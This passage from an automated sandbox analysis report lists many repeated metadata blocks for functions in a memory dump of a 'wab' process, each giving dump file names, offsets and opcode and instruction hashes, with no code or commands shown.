                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
                                            • Instruction ID: fa06adf7a1db3d148b100d6a7f9eda904cdedb3a30b1c342c02fd339986b0d65
                                            • Opcode Fuzzy Hash: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
                                            • Instruction Fuzzy Hash: BF012F32A05A449BD7119A14C800F4A3BA99BC5A34F1481DBEA258BA81CB74EF008B86
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 377bd067e1c1fd5b614b86b73dc36f889a32e5585700825a0b749e95694cc2d5
                                            • Instruction ID: de76050142630901e9aa5bbd482a84eab00b140719fb22bff20021f283dbd9e8
                                            • Opcode Fuzzy Hash: 377bd067e1c1fd5b614b86b73dc36f889a32e5585700825a0b749e95694cc2d5
                                            • Instruction Fuzzy Hash: 7D015271E01358AFC714DFA9D845E9EB7B8EF55710F004096B900EB390D678DB01CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed43f47c32cd0e7c859273f58e1fe92c5c64fdf5c1d6d8ccea4c2fd3c46d41ba
                                            • Instruction ID: a0f72e20d00382f69a1cc8d58a0c7807a77fb0b2a2d526ec14658139b49a317b
                                            • Opcode Fuzzy Hash: ed43f47c32cd0e7c859273f58e1fe92c5c64fdf5c1d6d8ccea4c2fd3c46d41ba
                                            • Instruction Fuzzy Hash: 09015E71E11358ABCB14DFA9D845EAEBBB8EF55714F0040A6B901EB280DA74DB01CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 534d522d9992205ec0f7d9012441fc91ae3193f984ad49d3c750343fedbc6a2c
                                            • Instruction ID: d01cf258da8395d42e0206c7b00795fa3a45d24f06d44efa90003b76134f1a3b
                                            • Opcode Fuzzy Hash: 534d522d9992205ec0f7d9012441fc91ae3193f984ad49d3c750343fedbc6a2c
                                            • Instruction Fuzzy Hash: 8801F232B00688DBC710EF66DC12D9EB3F8AF90A20B4440E9D945D7244DE34EE42C651
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f9d0b7029d2183d2ef1926bf5a3d88f2d4821c1badf559ec6341e7bc98b36cf
                                            • Instruction ID: a97b870ffa0c71bce917f41a8d48a379e7921971a1456d707c1bd3f5697531da
                                            • Opcode Fuzzy Hash: 1f9d0b7029d2183d2ef1926bf5a3d88f2d4821c1badf559ec6341e7bc98b36cf
                                            • Instruction Fuzzy Hash: C7012636300A019BC701EF3E9A10955BFE9FB6D26470801A9E508C3B28C232FF01CB19
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b022fc35fe1a8b1f472b495536e6180c208ffd4ed26543c1dd6332c163eece0e
                                            • Instruction ID: 0aa1464ba7f0304ea8d83b7d0ef1b21cc842d924ac8b469dbb7c2a6cea89787b
                                            • Opcode Fuzzy Hash: b022fc35fe1a8b1f472b495536e6180c208ffd4ed26543c1dd6332c163eece0e
                                            • Instruction Fuzzy Hash: CA018F71E00358ABD710DBA9D845FAFBBB8EF94704F0080AAF501EB280D674DA01CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                            • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                            • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                            • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e0cada72ed1f9df1b2d9657272593c7126c7c6098910bb11b711e8a4ee336bd
                                            • Instruction ID: 85b322b66003c87c58181265d3aaf6b3840e15143428c7817552f647c113fe83
                                            • Opcode Fuzzy Hash: 0e0cada72ed1f9df1b2d9657272593c7126c7c6098910bb11b711e8a4ee336bd
                                            • Instruction Fuzzy Hash: DF116D74E10259EFCB04DFA9D441A9EB7F4EF18704F14849AB915EB340E634DA02CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                            • Instruction ID: a88898bfa4dae212e23de8476ac94ad800e5236a4d42c99763e6dfc68e810ecd
                                            • Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                            • Instruction Fuzzy Hash: DEF028732416729FC33316DA4C41F1765A59FD5A60F5900F6E10CBB210CAA1AC4182D8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 451c2375e17cad64fe04fbc21ea2a1f1f0f2bc4f1370307c31492188f5e3f3fb
                                            • Instruction ID: 84061fb71f0a0320b036bb88904e334cb88bbb69ff8f5b27726ab34765fb3117
                                            • Opcode Fuzzy Hash: 451c2375e17cad64fe04fbc21ea2a1f1f0f2bc4f1370307c31492188f5e3f3fb
                                            • Instruction Fuzzy Hash: 1E110C70A002499FDB04DFA9D845A9DB7F4BF08200F0442AAE515EB381D634DA408B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                            • Instruction ID: 41684a911d4dfe5454e4773e74f5f040645e0db767ec24cc191c38c4b39471a8
                                            • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                            • Instruction Fuzzy Hash: 9DF0FF73A01614AFE309CF5CCC40F5AFBEDEB45610F0540AAE500DB221E671DF04CA98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96721b67c04c9ac2a5e9498cedb1dc91ab47f636838a65acb37a550e04fa64c4
                                            • Instruction ID: 810606b9af2bec7216745726da0ed850f656bfd2bcff8e2eee6bedd7e7347c34
                                            • Opcode Fuzzy Hash: 96721b67c04c9ac2a5e9498cedb1dc91ab47f636838a65acb37a550e04fa64c4
                                            • Instruction Fuzzy Hash: 52010CB1E00349AFCB54DFA9D945A9EB7F4FF18704F0080A9A955EB381E674DB00CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                            • Instruction ID: f8a9fca02fb109d8eb6ade9aa99bd031ece600a49e5fff129401e18167489a20
                                            • Opcode Fuzzy Hash: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                            • Instruction Fuzzy Hash: A0F0F672B067546BEB11D7A48C42FAEBFACBF81610F0484E99E01D7282D670FF4086A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3350bcc2ab524eec2b5a03241f1dba24ad35b0eccd93717a85849c3e18710d15
                                            • Instruction ID: 0defa32ddb752dfc5e55aacfb50f81ffdf1dc21a8e7db9ad31f15b7c5b7c3e6c
                                            • Opcode Fuzzy Hash: 3350bcc2ab524eec2b5a03241f1dba24ad35b0eccd93717a85849c3e18710d15
                                            • Instruction Fuzzy Hash: 0EF02B326443A55BE315D645CC52F53778AD7C0712F6940E7EA0C8B1D1E972FDC18294
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                            • Instruction ID: a38284a843932511f87d8980d568f9114269fcf9ce341a9a48ef0d4ac8b80047
                                            • Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                            • Instruction Fuzzy Hash: A8F04F72904244BFE7219B64CC41FDABBFCEB04714F0445A6A956D7180EA70EF40CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89502328f2f8c15c32a42cf73df8c61665da806e47863d4b452e93dda05a4fd4
                                            • Instruction ID: 06efc367cf8aadf3a4c3e62edf478a4adb9fa10af03c1e2978f7d11d89f7d57d
                                            • Opcode Fuzzy Hash: 89502328f2f8c15c32a42cf73df8c61665da806e47863d4b452e93dda05a4fd4
                                            • Instruction Fuzzy Hash: B8F0A4706093449FC314EF29C441A1BB7E4EF58B10F40469AB898DB380E634EA00C796
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d01f47a1c6a3cf52746cafebe556a7cb1ad3fd209ee28cb6abda80845b4d2e89
                                            • Instruction ID: 4468f87694e07102c1f4ad573bc98d1325be196eb65829617f1744d4207adfdf
                                            • Opcode Fuzzy Hash: d01f47a1c6a3cf52746cafebe556a7cb1ad3fd209ee28cb6abda80845b4d2e89
                                            • Instruction Fuzzy Hash: 62F0F032500700ABC731AB09CC05F8ABBFDEF90710F08019EA546A3091C7A4FA45C654
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ef7a4ba752dba8b86919ca6eadefe0f989ea3294f91c430631e258461650177
                                            • Instruction ID: 8d549ed0d2e2a47632504dfbf90bd14c64e82544c02e890fe1d9e6a4a1ca9802
                                            • Opcode Fuzzy Hash: 5ef7a4ba752dba8b86919ca6eadefe0f989ea3294f91c430631e258461650177
                                            • Instruction Fuzzy Hash: 84F04F75E00248AFDB14EFA9D945A9EB7F8FF18300F108499B905EB380E674DB00CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                            • Instruction ID: c095265c7b43f14e99d734512cab659d70066071231d5652e0efd5d58a0199f0
                                            • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                            • Instruction Fuzzy Hash: F6F0B472611A04AFE724CB25CC05F46B7E9EFA8710F1480B8A905D7164FAB1EE00D614
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89f22ff09bbf393853c55d2233532b87c86cce9b48e49f0b26809bf76505687d
                                            • Instruction ID: c634b4bcd0638a43b14190af69be517ca94ffc91b52e607c5021c743e23b1e21
                                            • Opcode Fuzzy Hash: 89f22ff09bbf393853c55d2233532b87c86cce9b48e49f0b26809bf76505687d
                                            • Instruction Fuzzy Hash: 99F06D75E10348EFCB14DFA9C805E9EB7F8EF18304F0080A9A501EB281E674DA00CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23d49be3cd5f9d036e36142b23b7492e3e323742102b8df3092337183460183b
                                            • Instruction ID: 88b3a0b2fae94d684a1ec6d9108cf6a34293b89f84d3d4f3dd14f81789120458
                                            • Opcode Fuzzy Hash: 23d49be3cd5f9d036e36142b23b7492e3e323742102b8df3092337183460183b
                                            • Instruction Fuzzy Hash: 45F0BEB1B117A69ED721A364C840F41F7D8BB036B0F0D8DE6D5298B652C3B4EAC4C654
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                            • Instruction ID: d240581019990143f5f816a1405ed16ba5b2dacf23af50e029705f46856377eb
                                            • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                            • Instruction Fuzzy Hash: 15E09232740A402BE7219E59DCD4F47B79EAFD3B10F0444B9B9045F141CAE29E0982A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c6759c5f00901b5c04f04ab9823fc68bdea6a99046ad8e0daf6d89cbb896750
                                            • Instruction ID: 87ddb567951f3322194869a246a66a576eabe01634b95c63c448cf88e514a492
                                            • Opcode Fuzzy Hash: 8c6759c5f00901b5c04f04ab9823fc68bdea6a99046ad8e0daf6d89cbb896750
                                            • Instruction Fuzzy Hash: BCF0E2B2911E909FC322A75ACC44B417FD89B016A4F2985E5E40687512C774DF81C288
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1a73ab6483fea9f67fa317074eea7e8c3c6132f8cc9d348733cf93d11f1f8e05
                                            • Instruction ID: f630e8e996268d58c7276202715b0fe513f30892864cfb75e30e442ec03f9061
                                            • Opcode Fuzzy Hash: 1a73ab6483fea9f67fa317074eea7e8c3c6132f8cc9d348733cf93d11f1f8e05
                                            • Instruction Fuzzy Hash: 9EF08275A10348ABCB14DBA9C856E9E77F8EF18704F1040D8E602EB280D974DA00C758
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 688cafcb9665713ac0121ebeeb9ae4d0c8303e76e4aa899adc1c716d78e6c560
                                            • Instruction ID: a0e85e6b23d8a17afcaf8d11dcd2aa44aacaa0f9c8844e835d0f8a7d2ea6b2ae
                                            • Opcode Fuzzy Hash: 688cafcb9665713ac0121ebeeb9ae4d0c8303e76e4aa899adc1c716d78e6c560
                                            • Instruction Fuzzy Hash: 10F08231E116949FD722EB25C944B417BD8AB84670F6D85E1D8198790AC334DFA0CA98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5df6475ae8be13a223e5cbe117cd35fafcb86a579128a82e4fbdad2851d825ba
                                            • Instruction ID: 76227856789f1d9f19b02bb2f10065ba1a7a9dd83d40fc3296dd9ee2a3c1072c
                                            • Opcode Fuzzy Hash: 5df6475ae8be13a223e5cbe117cd35fafcb86a579128a82e4fbdad2851d825ba
                                            • Instruction Fuzzy Hash: D8F08271A00248ABDB14DBB9D556E9E77F8AF19704F1044D8A601EB280EA78DA008758
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5379636c0d968a4c85a57cfd097c71de4044765e3853942f46e4104ebf7ae84a
                                            • Instruction ID: ae184c624f5c759eb3a0644ebaed6f32cef2960e254e309d7043bd2a94beb320
                                            • Opcode Fuzzy Hash: 5379636c0d968a4c85a57cfd097c71de4044765e3853942f46e4104ebf7ae84a
                                            • Instruction Fuzzy Hash: CAF08C71A04348ABDB14DBA9C94AE9EB7F8EF18704F4040D8F602EB280DA74DA008758
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
